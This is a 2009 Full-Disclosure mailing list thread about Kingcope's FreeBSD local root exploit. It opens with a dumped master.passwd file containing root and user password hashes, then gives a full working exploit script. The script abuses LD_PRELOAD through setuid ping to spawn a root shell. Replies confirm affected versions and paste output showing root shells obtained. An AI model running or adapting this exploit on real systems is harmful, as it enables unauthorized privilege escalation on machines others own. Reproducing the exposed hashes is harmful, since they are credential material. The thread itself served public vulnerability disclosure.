# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
kensmith Exp $
#
root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie :/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System :/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
:/home/kcope:/bin/sh
#
Systems tested/affected
**
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN
*EXPLOIT*
#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat env.c _EOF
#include stdio.h
main() {
extern char **environ;
environ = (char**)malloc(8096);
environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], LD_PRELOAD=/tmp/w00t.so.1.0);
execl(/sbin/ping, ping, 0);
}
_EOF
gcc env.c -o env
cat program.c _EOF
#include unistd.h
#include stdio.h
#include sys/types.h
#include stdlib.h
void _init() {
extern char **environ;
environ=NULL;
system(echo ALEX-ALEX;/bin/sh);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
On 11/30/09, Kingcope kco...@googlemail.com wrote: Systems tested/affected ** FreeBSD 8.0-RELEASE *** VULNERABLE FreeBSD 7.1-RELEASE *** VULNERABLE FreeBSD 6.3-RELEASE *** NOT VULN FreeBSD 4.9-RELEASE *** NOT VULN Glad I still run 6.3! How about 6.4? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
Confirmed on 7.2-RELEASE-p4 fully patched according to freebsd-update. %sh exploit.sh Desktop env env.c exploit exploit.c exploit.sh payload.c payload.o private program.c program.o public public_html run.sh w00t.so.1.0 FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # id uid=1001(phantomcircuit) gid=20(staff) euid=0(root) groups=20(staff),0(wheel) # uname -a FreeBSD phantomcircuit.mine.nu 7.2-RELEASE-p4 FreeBSD 7.2-RELEASE-p4 #0: Fri Oct 2 12:21:39 UTC 2009 r...@i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC i386 # ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
7.0 not vuln. On Mon, Nov 30, 2009 at 10:49 PM, Ed Carp e...@pobox.com wrote: On 11/30/09, Kingcope kco...@googlemail.com wrote: Systems tested/affected ** FreeBSD 8.0-RELEASE *** VULNERABLE FreeBSD 7.1-RELEASE *** VULNERABLE FreeBSD 6.3-RELEASE *** NOT VULN FreeBSD 4.9-RELEASE *** NOT VULN Glad I still run 6.3! How about 6.4? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Nov 30, 2009, at 6:31 PM, phantomcircuit wrote: Confirmed on 7.2-RELEASE-p4 fully patched according to freebsd-update. %sh exploit.sh Desktop env env.c exploit exploit.c exploit.sh payload.c payload.o private program.c program.o public public_html run.sh w00t.so.1.0 FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # id uid=1001(phantomcircuit) gid=20(staff) euid=0(root) groups=20(staff),0(wheel) # uname -a FreeBSD phantomcircuit.mine.nu 7.2-RELEASE-p4 FreeBSD 7.2-RELEASE-p4 #0: Fri Oct 2 12:21:39 UTC 2009 r...@i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC i386 # ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ 7.2-RELEASE [co...@popo ~]$ ./env /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Darwin) iEYEARECAAYFAksUYGkACgkQAr2PPaFwRupDPQCcDtqiPyNof9ST2gLjJBw8pNMM nMQAn0ynrghE5hrzeuIWVIdZg5N5N1hT =HN3D -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
6.4-RELEASE not vuln On (11/30/09 22:51), Benji wrote: 7.0 not vuln. On Mon, Nov 30, 2009 at 10:49 PM, Ed Carp e...@pobox.com wrote: On 11/30/09, Kingcope kco...@googlemail.com wrote: Systems tested/affected ** FreeBSD 8.0-RELEASE *** VULNERABLE FreeBSD 7.1-RELEASE *** VULNERABLE FreeBSD 6.3-RELEASE *** NOT VULN FreeBSD 4.9-RELEASE *** NOT VULN Glad I still run 6.3! How about 6.4? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ryan Steinmetz Lead Security/Systems Administrator Infrastructure Engineering Rochester Institute of Technology 585.475.5663 PGP: EF36 D45A 5CA9 28B1 A550 18CD A43C D111 7AD7 FAF2 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
7.0 not vuln. 7.0 vulnerable here, $ ./env /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # uname -r 7.0-RELEASE-p3 On Mon, Nov 30, 2009 at 10:49 PM, Ed Carp erc at pobox.com wrote: On 11/30/09, Kingcope kcope2 at googlemail.com wrote: Systems tested/affected ** FreeBSD 8.0-RELEASE *** VULNERABLE FreeBSD 7.1-RELEASE *** VULNERABLE FreeBSD 6.3-RELEASE *** NOT VULN FreeBSD 4.9-RELEASE *** NOT VULN Glad I still run 6.3! How about 6.4? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- David BERARD - contact(at)davidberard.fr GPG|PGP KeyId 0xC8533354 GPG|PGP Key http://davidberard.fr/C8533354.gpgkey - * No electrons were harmed in * * the transmission of this email* PGP.sig Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
On Nov 30, 2009, at 9:25 PM, David Berard wrote: 7.0 not vuln. 7.0 vulnerable here, $ ./env /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # uname -r 7.0-RELEASE-p3 Here as well: bin/Kingcope.sh: new file: 35 lines, 772 characters. [ch...@demon ~]$ chmod +x bin/Kingcope.sh [ch...@demon ~]$ Kingcope.sh bin ktrace.out scratch vent_stalk FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # whoami root # uname -a FreeBSD demon.smtps.net 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 r...@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 It's a VM if that matters. -- chort ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
